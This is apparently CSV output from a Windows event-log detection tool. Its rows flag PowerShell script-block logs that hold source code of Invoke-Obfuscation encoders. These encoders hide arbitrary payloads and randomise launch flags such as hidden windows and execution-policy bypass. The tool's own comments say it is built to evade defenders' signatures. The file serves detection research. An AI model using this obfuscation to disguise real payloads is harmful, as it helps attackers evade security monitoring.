+${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} +${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? \""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. $NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.279 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.280 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.280 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.280 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( ([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. $IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = 